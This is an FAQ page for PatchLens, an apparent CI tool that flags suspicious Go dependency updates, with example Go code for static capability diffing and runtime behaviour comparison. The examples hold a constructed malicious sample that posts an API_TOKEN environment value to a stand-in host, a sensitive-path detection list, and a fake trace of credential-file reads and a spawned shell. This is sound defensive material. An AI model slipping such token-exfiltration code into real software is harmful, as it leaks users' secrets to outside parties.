PatchLens FAQs
What languages does PatchLens support?
PatchLens currently only supports Golang projects.
How does PatchLens integrate?
PatchLens is designed to be included as part of your continuous integration pipeline. It works with existing tools (like Dependabot or Snyk) which create pull requests or otherwise initiate dependency updates. When the CI workflow for such an update starts, it should execute PatchLens to analyze the update and produce a report specific to that change.
Getting Started
If you want to include PatchLens in your GitHub workflows see the go-dep-impact-action repo. For one-off runs or other CI integrations try our open source CLI in the go-update-lens repo.
Do you detect 0-day supply chain compromises?
PatchLens combines static code analysis with runtime behavioral analysis to catch suspicious changes in dependency updates:
Static Analysis: We automatically scan for new or modified code that performs security-sensitive operations—like network requests, filesystem access, system calls, or data obfuscation techniques. If a dependency update introduces these capabilities, we flag it for review.
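To make the static side concrete, here is a small added example (not PatchLens code) of the core idea: parse the old and new versions of a Go source file, extract the security-sensitive capabilities each one exercises, and report only the capabilities the update introduces. The capability catalogue, the textutil sample package and the function names are all constructed for this illustration; PatchLens's own catalogue and analysis are far more extensive.

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
	"sort"
	"strings"
)

// Catalogue of security-sensitive capabilities, keyed by import path or by
// package-qualified call. Constructed for this example; a real scanner would
// carry a far larger list. Calls are listed separately because nearly every
// package imports "os", so the import alone says little.
var capabilityByImport = map[string]string{
	"net": "network", "net/http": "network",
	"os/exec": "process-exec", "encoding/base64": "obfuscation",
}
var capabilityByCall = map[string]string{
	"os.Getenv": "env-read", "os.Environ": "env-read",
	"os.ReadFile": "file-read", "os.WriteFile": "file-write",
}

// Capabilities parses one Go source file and returns the set of
// security-sensitive capabilities it exercises.
func Capabilities(src string) (map[string]bool, error) {
	f, err := parser.ParseFile(token.NewFileSet(), "pkg.go", src, 0)
	if err != nil {
		return nil, err
	}
	caps := map[string]bool{}
	aliases := map[string]string{} // local package name -> import path
	for _, imp := range f.Imports {
		path := strings.Trim(imp.Path.Value, "\"")
		name := path[strings.LastIndex(path, "/")+1:]
		if imp.Name != nil { // aliased import, e.g. import h "net/http"
			name = imp.Name.Name
		}
		aliases[name] = path
		if c, ok := capabilityByImport[path]; ok {
			caps[c] = true
		}
	}
	// Resolve every pkg.Func selector through the alias table so that
	// renaming an import does not hide the call.
	ast.Inspect(f, func(n ast.Node) bool {
		if sel, ok := n.(*ast.SelectorExpr); ok {
			if pkg, ok := sel.X.(*ast.Ident); ok {
				if c, ok := capabilityByCall[aliases[pkg.Name]+"."+sel.Sel.Name]; ok {
					caps[c] = true
				}
			}
		}
		return true
	})
	return caps, nil
}

// NewCapabilities returns, sorted, the capabilities present in the updated
// source but absent from the previous version: the set a reviewer should be
// asked to justify before the update is merged.
func NewCapabilities(before, after string) ([]string, error) {
	old, err := Capabilities(before)
	if err != nil {
		return nil, err
	}
	cur, err := Capabilities(after)
	if err != nil {
		return nil, err
	}
	var added []string
	for c := range cur {
		if !old[c] {
			added = append(added, c)
		}
	}
	sort.Strings(added)
	return added, nil
}

// Constructed sample: a string helper before and after an update that quietly
// adds an outbound request carrying a value read from the environment.
const beforeSrc = `package textutil
import "strings"
func Normalize(s string) string { return strings.TrimSpace(s) }`

const afterSrc = `package textutil
import ("net/http"; "os"; "strings")
func Normalize(s string) string {
	http.Post("https://example.invalid/c", "text/plain", strings.NewReader(os.Getenv("API_TOKEN")))
	return strings.TrimSpace(s)
}`

func main() {
	added, err := NewCapabilities(beforeSrc, afterSrc)
	if err != nil {
		panic(err)
	}
	fmt.Println("capabilities introduced by the update:", added)
}
```

Running it reports that the update introduces the env-read and network capabilities, which is exactly the kind of delta a reviewer wants surfaced: a text-normalisation helper has no business reading API_TOKEN or opening outbound connections. The alias table matters in practice; a scanner that matches only on literal `os.` or `http.` prefixes is trivially hidden from by importing the package under another name.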
Behavioral Analysis: We don't just look for new capabilities—we monitor how dependencies actually behave at runtime. Even if a package already performs network operations or file access, we detect when that behavior changes. For example:
A networking library that starts connecting to unexpected servers
A utility that begins accessing credential files or environment variables it previously ignored
A package that changes which files it reads or how it processes data
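The behavioural side works on a different axis: not "does this package use the network?" but "does it use it the way the previous version did?". The following added example (again not PatchLens code) shows that comparison on constructed trace data. It assumes some tracer has already produced a list of connect/open/getenv/exec events from running each version's test suite; the event format, the sensitive-prefix list and the two traces are all made up for the illustration.

```go
package main

import (
	"fmt"
	"sort"
	"strings"
)

// Event is one observation from a runtime trace of the dependency's test
// suite (assumed tracer output; the format is constructed for this example).
type Event struct {
	Kind   string // "connect", "open", "getenv", "exec"
	Target string // host, file path, variable name or program
}

// Profile records, per capability kind, every target that was touched.
type Profile map[string]map[string]bool

// BuildProfile folds a trace into a Profile.
func BuildProfile(events []Event) Profile {
	p := Profile{}
	for _, e := range events {
		if p[e.Kind] == nil {
			p[e.Kind] = map[string]bool{}
		}
		p[e.Kind][e.Target] = true
	}
	return p
}

// sensitivePrefixes marks targets whose first-time access deserves attention
// whatever else changed (constructed list).
var sensitivePrefixes = []string{"/etc/shadow", "/home/", "/root/", "AWS_", "GITHUB_TOKEN"}

func isSensitive(target string) bool {
	for _, p := range sensitivePrefixes {
		if strings.HasPrefix(target, p) {
			return true
		}
	}
	return false
}

// Deviations compares the updated version's profile with the previous
// version's baseline and returns one sorted finding per behaviour the
// baseline did not contain. Behaviour already in the baseline is not
// reported, which is what keeps the signal useful for packages that
// legitimately use the network or the filesystem.
func Deviations(baseline, updated Profile) []string {
	var out []string
	for kind, targets := range updated {
		base, knownKind := baseline[kind]
		for target := range targets {
			if base[target] {
				continue // same behaviour as before
			}
			reason := "new target for existing capability"
			if !knownKind {
				reason = "capability not seen in previous version"
			}
			if isSensitive(target) {
				reason += " (sensitive resource)"
			}
			out = append(out, fmt.Sprintf("%s %s: %s", kind, target, reason))
		}
	}
	sort.Strings(out)
	return out
}

// Constructed traces: an HTTP client library before and after an update.
var baselineTrace = []Event{
	{"connect", "api.example.com:443"},
	{"open", "/etc/ssl/certs/ca-certificates.crt"},
	{"getenv", "HTTP_PROXY"},
}

var updatedTrace = []Event{
	{"connect", "api.example.com:443"},
	{"open", "/etc/ssl/certs/ca-certificates.crt"},
	{"getenv", "HTTP_PROXY"},
	{"connect", "metrics.example.invalid:443"}, // endpoint the old version never contacted
	{"getenv", "AWS_SECRET_ACCESS_KEY"},         // variable it previously ignored
	{"open", "/home/ci/.aws/credentials"},       // credential file
	{"exec", "/bin/sh"},                         // capability absent from the old version
}

func main() {
	for _, f := range Deviations(BuildProfile(baselineTrace), BuildProfile(updatedTrace)) {
		fmt.Println(f)
	}
}
```

The three unchanged events (the existing API host, the CA bundle, HTTP_PROXY) produce no findings even though they are network and filesystem activity, while the new endpoint, the credential reads and the spawned shell each get a line. That is the property the FAQ describes: a library that already talks to the network is not flagged for talking to the network, only for talking to somewhere new.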
This dual approach catches sophisticated attacks where malicious actors subtly modify legitimate packages to exfiltrate data or compromise systems. Because PatchLens runs automatically in your CI pipeline on every dependency update, these threats are identified before they're merged—turning detection into prevention.
What is the project maturity?
PatchLens is a new tool. Although we are confident that it is capable of providing valuable signal into your dependency updates, it is also still a work in progress. Supported features will improve and evolve, and we welcome your feedback.